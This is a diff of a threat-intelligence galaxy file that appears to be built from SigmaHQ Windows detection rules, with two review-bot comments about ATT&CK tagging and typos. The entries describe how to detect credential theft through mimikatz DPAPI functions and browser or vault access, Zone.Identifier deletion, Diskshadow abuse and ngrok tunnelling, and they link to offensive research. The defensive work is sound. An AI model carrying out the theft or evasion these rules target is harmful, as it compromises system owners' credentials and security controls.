- "https://lolbas-project.github.io/lolbas/Libraries/Desk/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d",
- "value": "SCR File Write Event"
- },
 {
 "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used",
 "meta": {
@@ -41503,10 +41962,10 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc",
- "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://github.com/Wh04m1001/SysmonEoP",
 "https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml"
 ],
@@ -41592,8 +42051,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "Internal Research",
+ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml"
 ],
 "tags": [
@@ -41758,8 +42217,20 @@
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.008"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1",
 "value": "Rename Common File to DLL File"
 },
@@ -41843,8 +42314,8 @@
 "logsource.category": "file_delete",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/cube0x0/CVE-2021-1675",
+ "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml"
 ],
 "tags": [
@@ -41979,8 +42450,8 @@
 "logsource.category": "file_delete",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/9",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml"
 ],
 "tags": [
@@ -42100,6 +42571,40 @@
 "uuid": "ff301988-c231-4bd0-834c-ac9d73b86586",
 "value": "PowerShell Console History Logs Deleted"
 },
+ {
+ "description": "Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Other third party applications not listed."
+ ],
+ "filename": "file_delete_win_zone_identifier_ads_uncommon.yml",
+ "level": "medium",
+ "logsource.category": "file_delete",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "3109530e-ab47-4cc6-a953-cac5ebcc93ae",
+ "value": "ADS Zone.Identifier Deleted By Uncommon Application"
+ },
 {
 "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)",
 "meta": {
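Review bot: The new `ADS Zone.Identifier Deleted By Uncommon Application` element (uuid `3109530e-ab47-4cc6-a953-cac5ebcc93ae`) is mapped only to `attack.t1070.004` (Indicator Removal: File Deletion), while its own description says the purpose of removing the ADS is to bypass the security restrictions that depend on it. That behaviour is what ATT&CK catalogues as Mark-of-the-Web Bypass (T1553.005), so an analyst pivoting from that technique in the galaxy will not find this rule. Presumably the tag set mirrors the upstream Sigma rule, so adding `attack.t1553.005` and a matching `related` entry pointing at that technique's galaxy UUID belongs in `file_delete_win_zone_identifier_ads_uncommon.yml` first and would then flow into this cluster on the next sync. I cannot tell from the diff alone whether upstream already carries that tag.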
@@ -42134,21 +42639,24 @@
 "value": "Unusual File Deletion by Dns.exe"
 },
 {
- "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n",
+ "description": "Detects file access requests to browser credential stores by uncommon processes.\nCould indicate potential attempt of credential stealing.\nRequires heavy baselining before usage\n",
 "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/10/11",
+ "author": "frack113",
+ "creation_date": "2022/04/09",
 "falsepositive": [
- "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)."
+ "Antivirus, Anti-Spyware, Anti-Malware Software",
+ "Backup software",
+ "Legitimate software installed on partitions other than \"C:\\\"",
+ "Searching software such as \"everything.exe\""
 ],
- "filename": "file_access_win_credential_manager_stealing.yml",
- "level": "medium",
+ "filename": "file_access_win_browser_credential_access.yml",
+ "level": "low",
 "logsource.category": "file_access",
 "logsource.product": "windows",
 "refs": [
- "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz",
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml"
+ "https://github.com/lclevy/firepwd",
+ "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_access.yml"
 ],
 "tags": [
 "attack.t1003",
@@ -42164,11 +42672,11 @@
 "type": "related-to"
 }
 ],
- "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6",
- "value": "Credential Manager Access"
+ "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf",
+ "value": "Access To Browser Credential Files By Uncommon Application"
 },
 {
- "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n",
+ "description": "Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n",
 "meta": {
 "author": "Nasreddine Bencherchali (Nextron Systems)",
 "creation_date": "2022/10/17",
@@ -42180,8 +42688,8 @@
 "logsource.category": "file_access",
 "logsource.product": "windows",
 "refs": [
- "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/",
 "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords",
+ "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml"
 ],
 "tags": [
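Review bot: The rewritten description for uuid `46612ae6-86be-4802-bc07-39b59feb1309` in this hunk reads `Detects file access requests to the the Windows Data Protection API Master keys`, with a doubled "the", and the new `.Reg/.Hive` element added in the hunk at line 173 carries `usally associated with Windows Registry backups`. Every element names its source rule in `filename`, so this cluster looks to be regenerated from the SigmaHQ rule set and a hand edit of the JSON would be overwritten on the next import; the wording should be fixed upstream in `file_access_win_dpapi_master_key_access.yml` and `file_access_win_reg_and_hive_access.yml` and picked up on the next sync. The same applies to `postitve` and `levreage` in the Diskshadow element at line 183. As a point of style, the element at line 173 also lists the technique `attack.t1112` before the tactic `attack.defense_evasion`, the reverse of every other `tags` array in view.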
@@ -42199,27 +42707,24 @@
 }
 ],
 "uuid": "46612ae6-86be-4802-bc07-39b59feb1309",
- "value": "Suspicious Access To Windows DPAPI Master Keys"
+ "value": "Access To Windows DPAPI Master Keys By Uncommon Application"
 },
 {
- "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing",
+ "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n",
 "meta": {
- "author": "frack113",
- "creation_date": "2022/04/09",
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2022/10/11",
 "falsepositive": [
- "Antivirus, Anti-Spyware, Anti-Malware Software",
- "Backup software",
- "Legitimate software installed on partitions other than \"C:\\\"",
- "Searching software such as \"everything.exe\""
+ "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)."
 ],
- "filename": "file_access_win_browser_credential_stealing.yml",
+ "filename": "file_access_win_credential_manager_access.yml",
 "level": "medium",
 "logsource.category": "file_access",
 "logsource.product": "windows",
 "refs": [
- "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users",
- "https://github.com/lclevy/firepwd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml"
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_access.yml"
 ],
 "tags": [
 "attack.t1003",
@@ -42235,11 +42740,11 @@
 "type": "related-to"
 }
 ],
- "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf",
- "value": "Suspicious Access To Browser Credential Files"
+ "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6",
+ "value": "Credential Manager Access By Uncommon Application"
 },
 {
- "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n",
+ "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n",
 "meta": {
 "author": "Nasreddine Bencherchali (Nextron Systems)",
 "creation_date": "2022/10/17",
@@ -42251,8 +42756,8 @@
 "logsource.category": "file_access",
 "logsource.product": "windows",
 "refs": [
- "https://www.passcape.com/windows_password_recovery_dpapi_credhist",
 "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist",
+ "https://www.passcape.com/windows_password_recovery_dpapi_credhist",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml"
 ],
 "tags": [
@@ -42270,7 +42775,40 @@
 }
 ],
 "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2",
- "value": "Suspicious Access To Windows Credential History File"
+ "value": "Access To Windows Credential History File By Uncommon Application"
+ },
+ {
+ "description": "Detects file access requests to files ending with either the \".hive\"/\".reg\" extension, usally associated with Windows Registry backups.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2023/09/15",
+ "falsepositive": [
+ "Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required."
+ ],
+ "filename": "file_access_win_reg_and_hive_access.yml",
+ "level": "low",
+ "logsource.category": "file_access",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/tccontre/Reg-Restore-Persistence-Mole",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_reg_and_hive_access.yml"
+ ],
+ "tags": [
+ "attack.t1112",
+ "attack.defense_evasion"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "337a31c6-46c4-46be-886a-260d7aa78cac",
+ "value": "Access To .Reg/.Hive Files By Uncommon Application"
 },
 {
 "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)",
@@ -42351,8 +42889,8 @@
 "logsource.category": "dns_query",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/notwhickey/status/1333900137232523264",
 "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
+ "https://twitter.com/notwhickey/status/1333900137232523264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"
 ],
 "tags": [
@@ -42451,10 +42989,10 @@
 "logsource.category": "dns_query",
 "logsource.product": "windows",
 "refs": [
+ "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
- "https://redcanary.com/blog/misbehaving-rats/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml"
 ],
 "tags": [
@@ -42697,9 +43235,9 @@
 "logsource.category": "dns_query",
 "logsource.product": "windows",
 "refs": [
+ "https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations",
 "https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations",
 "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update",
- "https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_socgholish_second_stage_c2.yml"
 ],
 "tags": [
@@ -42800,11 +43338,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
- "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/",
 "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
+ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/",
 "https://redcanary.com/blog/raspberry-robin/",
+ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml"
 ],
@@ -42896,8 +43434,8 @@
 "logsource.product": "windows",
 "refs": [
 "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/",
- "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/",
+ "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"
 ],
 "tags": [
@@ -43020,8 +43558,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
 "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20",
+ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml"
 ],
@@ -43089,9 +43627,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://redcanary.com/threat-detection-report/",
 "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
 "https://www.cobaltstrike.com/help-windows-executable",
- "https://redcanary.com/threat-detection-report/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml"
 ],
 "tags": [
@@ -43205,11 +43743,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
 "https://www.joeware.net/freetools/tools/adfind/",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
 "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
 "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml"
 ],
@@ -43288,39 +43826,6 @@
 "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89",
 "value": "WhoAmI as Parameter"
 },
- {
- "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/26",
- "falsepositive": [
- "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates"
- ],
- "filename": "proc_creation_win_taskkill_execution.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_execution.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1489"
- ]
- },
- "related": [
- {
- "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d",
- "value": "Suspicious Execution of Taskkill"
- },
 {
 "description": "Execution of well known tools for data exfiltration and tunneling",
 "meta": {
@@ -43417,8 +43922,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml"
 ],
 "tags": [
@@ -43559,8 +44064,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/countuponsec/status/910969424215232518",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
 "https://twitter.com/countuponsec/status/910977826853068800",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"
 ],
 "tags": [
@@ -43593,9 +44098,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
- "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
 "https://www.fortiguard.com/threat-signal-report/4718?s=09",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_suspicious_execution.yml"
 ],
 "tags": [
@@ -43661,8 +44166,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://h.43z.one/ipconverter/",
 "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
+ "https://h.43z.one/ipconverter/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml"
 ],
 "tags": [
@@ -43835,8 +44340,20 @@
 "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1210"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6",
 "value": "Suspicious SysAidServer Child"
 },
@@ -43855,8 +44372,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
 "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
 "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml"
 ],
@@ -43891,8 +44408,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/shantanu561993/SharpChisel",
 "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
+ "https://github.com/shantanu561993/SharpChisel",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml"
 ],
 "tags": [
@@ -43912,49 +44429,6 @@
 "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf",
 "value": "HackTool - SharpChisel Execution"
 },
- {
- "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Samir Bousseaden",
- "creation_date": "2021/11/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_lsass_clone.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
- "https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
- "https://twitter.com/Hexacorn/status/1420053502554951689",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e",
- "value": "Potential Credential Dumping Via LSASS Process Clone"
- },
 {
 "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.",
 "meta": {
@@ -43968,8 +44442,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
 "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
 "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_susp_flags.yml"
 ],
@@ -44024,6 +44498,45 @@
 "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b",
 "value": "Suspicious GUP Usage"
 },
+ {
+ "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/15",
+ "falsepositive": [
+ "False postitve can occur in cases where admin scripts levreage the \"exec\" flag to execute applications"
+ ],
+ "filename": "proc_creation_win_diskshadow_child_process_susp.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware",
+ "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
+ "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/",
+ "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4",
+ "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8",
+ "value": "Potentially Suspicious Child Process Of DiskShadow.EXE"
+ },
 {
 "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n",
 "meta": {
@@ -44038,11 +44551,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://ngrok.com/docs",
- "https://www.softwaretestinghelp.com/how-to-use-ngrok/",
- "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
 "https://twitter.com/xorJosh/status/1598646907802451969",
+ "https://www.softwaretestinghelp.com/how-to-use-ngrok/",
+ "https://ngrok.com/docs",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
